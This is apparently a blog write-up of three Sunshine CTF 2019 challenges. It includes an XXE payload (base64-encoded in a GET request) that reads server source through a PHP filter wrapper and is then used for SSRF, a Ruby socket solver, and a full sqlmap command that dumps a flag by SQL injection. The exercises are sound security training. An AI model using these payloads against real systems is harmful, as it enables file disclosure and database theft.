Information#
CTF#
- Name : Sunshine CTF 2019
- Website : 2019.sunshinectf.org
- Type : Online
- Format : Jeopardy
- CTF Time : link
150 - Wrestler Name Generator - Web#
Even better than the Wu-Tang name generator, legend has it that Hulk Hogan used this app to get his name.
Author: dmaria
There is a form and a JavaScript script generating a XML document. It must be a XXE injection again.
1 | <form> |
Let's try an external entity injection and a paylaod using a PHP wrapper.
1 | <input><firstName>&test;</firstName><lastName>rawsec</lastName></input> |
Don't forget to URL-encode key characters of the input to avoid parsing errors:
1 | GET /generate.php?input=PD94bWwgdmVyc2lvbj0nMS4wJyBlbmNvZGluZz0nVVRGLTgnPz48IURPQ1RZUEUgcm9vdCBbPCFFTlRJVFkgdGVzdCBTWVNURU0gJ3BocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNvZGUvcmVzb3VyY2U9Z2VuZXJhdGUucGhwJz5dPjxpbnB1dD48Zmlyc3ROYW1lPiZ0ZXN0OzwvZmlyc3ROYW1lPjxsYXN0TmFtZT5yYXdzZWM8L2xhc3ROYW1lPjwvaW5wdXQ%2b HTTP/1.1 |
We have the dump of generate.php
in base64:
1 | HTTP/1.1 200 OK |
Let's decode it and see what it looks like:
1 |
|
We must fool the server to think we access the page from localehost. The HTTP header X-Forwarded-For
doesn't work here.
So we must do a SSRF from the XXE:
directly:
1 | <input><firstName>&test;</firstName><lastName>rawsec</lastName></input> |
or with base64 encoding for the output:
1 | <input><firstName>&test;</firstName><lastName>rawsec</lastName></input> |
I got the flag: sun{1_l0v3_hulk_7h3_3x73rn4l_3n717y_h064n}
.
50 - TimeWarp - Scripting#
Oh no! A t3mp0ral anoma1y has di5rup7ed the timeline! Y0u'll have to 4nswer the qu3stion5 before we ask them!
nc tw.sunshinectf.org 4101
Author: Mesaj2000
We must send a wrong value, parse the output to know and store the right value, then begin back at the start and send the right value we just learnt, then send a wrong value, and do it over and over until we get the 300 values.
I made a slow ruby script that needs more than 1 hour to solve the challenge:
1 | require 'socket' |
PS: changing tcp socket behavior and reading buffer size can drastically improve the timing performance.
100 - WrestlerBook - Web#
WrestlerBook is the social network for wrestlers, by wrestlers. WrestlerBook is exclusively for wrestlers, so if you didn't get an invite don't even bother trying to view our profiles.
Author: dmaria
A classic SQLi, just know how to use SQLmap:
1 | sqlmap -u 'http://bk.sunshinectf.org/login.php' --method POST --data 'username=a&password=b' -p password --dbms SQLite --technique U -T users -D SQLite_masterdb -C flag --risk 3 --union-from users --dump --flush-session |
PS : columns retrieving with SQLmap for SQLite DBMS is buggy.